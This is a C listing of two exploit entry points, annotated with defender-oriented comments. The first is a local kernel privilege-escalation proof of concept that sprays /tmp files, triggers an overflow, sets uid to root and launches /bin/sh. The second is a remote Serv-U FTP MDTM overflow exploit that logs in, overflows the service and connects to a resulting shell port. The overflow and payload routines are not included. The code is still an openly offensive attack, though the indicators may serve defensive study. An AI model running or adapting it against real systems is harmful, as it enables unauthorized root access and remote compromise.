/*
 * Entry point of a local privilege-escalation proof of concept.
 * The kernel-side part lives in get_kernel_syms() and do_overflow(), neither
 * of which is in this listing; what is visible here is the user-space setup
 * around them.  Host-level indicators a defender can take straight from the
 * code below: a burst of creates of /tmp/tmpfile<N> that only stops when
 * open() fails, a 5-byte "YOUPI" write to every one of those files, and an
 * unprivileged process calling setresuid(0, 0, 0) and then execl()ing
 * /bin/sh.
 *
 * argv[1] (optional, default 1): how many descriptors to close before
 * do_overflow(); the original comment says 3 is the expected value.
 * Returns 1 only if execl() itself returns.
 */
int main(int argc, char ** argv) {

 int i, nbfiles;
 int * files;
 char tmpfile[100];

 get_kernel_syms();   /* not shown; presumably resolves kernel symbols -- TODO confirm */

 files = malloc(sizeof(int));   /* unchecked; grown by one int per opened file below */

 //check_slabs();
 /* Spray slab with file structs */
 /* Runs until open() fails (presumably the per-process fd limit), so on exit
  * i equals the number of files actually opened.  Note for reviewers: O_CREAT
  * is used without a mode argument, the realloc() result is not checked, and
  * files[i] is assigned even when open() returned -1. */
 for (i=0;;i++) {
	sprintf(tmpfile, "/tmp/tmpfile%d", i);
	files = realloc(files, (i+1)*sizeof(int));
	if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0)
		break;
 }
 //check_slabs();
 
 printf("[+] Created %d files\n", nbfiles = i);   /* nbfiles is assigned inside the printf argument */
 /* We cannot check slab info
  * so may not be properly aligned
  * (should work with argv[1] = 3)
  */
 /* Closes argv[1] of the most recently opened descriptors, starting four from
  * the end.  The index goes negative if fewer than four files were opened;
  * atoi() on argv[1] is not validated. */
 for (i=0;i< (argc > 1 ? atoi(argv[1]) : 1);i++) {
 	close(files[nbfiles-4-i]);
 }

 do_overflow();   /* not in this listing */

 /* Touches every descriptor, including the ones closed above; the write()
  * and close() return values are ignored. */
 for (i=0;i<nbfiles;i++)
	write(files[i], "YOUPI", 5); 
 for (i=0;i<nbfiles;i++)
	close(files[i]);

  /* A non-root process succeeding at setresuid(0, 0, 0) is the observable
   * sign that the kernel-side change took effect. */
  if (setresuid(0, 0, 0)) {
	printf("[-] Exploit failed :(\n");
	exit(1);
  }
  setresgid(0, 0, 0);   /* return value ignored */

  printf("[+] Launching root shell!\n");

  execl("/bin/sh", "/bin/sh", NULL);   /* only reached after the uid change succeeded */

  return 1;
}
Example #2
/*
 * Entry point of a remote exploit proof of concept against the Serv-U FTPD
 * MDTM command (see the banner printed below).  Flow visible here: parse
 * options, authenticate with ftp_login(), hand the descriptor to
 * do_overflow() (not in this listing), drop the control connection, wait
 * three seconds, then connect to the same host on `shellport` and attach a
 * shell with sh().  From a defender's point of view the observable pattern
 * is "FTP login -> MDTM -> new inbound TCP connection to a non-FTP port on
 * the server a few seconds later"; the listener on `shellport` is presumably
 * created by the payload, which is not shown.
 *
 * Options: -h host, -t sets x (presumably a target selector; bounded above
 * by MAX_NUM), -u/-p FTP credentials (the literals below are redacted
 * placeholders), -P FTP port, -d shell port.  "c:" is in the getopt()
 * string but has no case, so -c falls through to showHELP().
 * `x`, `port`, `shellport`, `MAX_NUM` and `VER` are file-scope names defined
 * outside this listing.
 * Returns 0 on success or when help is shown, -1 when the shell connection
 * fails; exits with status 1 or -1 on argument/login errors.
 */
int main (int c, char *v[])
{
        int             ch, fd, sd;
        char     *hostName = NULL, *userName = "******", *passWord = "******";
        shellport  = port;   /* default shell port is the FTP port unless -d overrides it */
        

        fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
                "bug find by bkbll ([email protected]) code by Sam ([email protected])\n\n");

        if (c < 2) {   /* no arguments at all: print usage and stop */
                showHELP (v[0]);
                exit (1);
        }

        while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
                switch(ch) {
                        case 'h':
                                hostName = optarg;   /* stays NULL if -h is omitted */
                                break;
                        case 't':
                                x = atoi (optarg);
                                /* only the upper bound is checked; a negative or non-numeric
                                 * value (atoi() returns 0) passes through */
                                if (x > MAX_NUM) {
                                        printf ("[-] wtf your input?\n");
                                        exit (-1);
                                }
                                break;
                        case 'u':
                                userName = optarg;
                                break;
                        case 'p':
                                passWord = optarg;
                                break;
                        case 'P':
                        	port = atoi (optarg);   /* unvalidated */
                        	break;
                        case 'd':
                        	shellport = atoi (optarg);   /* unvalidated */
                        	break;
                        default:   /* unknown option, missing argument, or -c (no case above) */
                                showHELP (v[0]);
                                return 0;
                }
        }


        /* ftp_login() is not shown; by the check below it returns a socket
         * descriptor > 0 on success */
        fd = ftp_login (hostName, port, userName, passWord);
        if (fd <= 0) {
                printf ("[-] can't connnect\n");
                exit (-1);
        }

        do_overflow (fd);   /* not in this listing */

	close (fd);
	 
        sleep (3);   /* presumably gives the service time to start listening on shellport */
       
        /* third argument presumably a timeout -- new_tcpConnect() is not shown */
        sd = new_tcpConnect (hostName, shellport, 3000);
        if (sd <= 0) {
                printf ("[-] failed\n");
                return -1;
        }

        fprintf (stderr, "[+] successed!!\n\n\n");
        sh (0, 1, sd);   /* relays stdin/stdout to the socket; returns when the session ends */

        close (sd);

        return 0;
}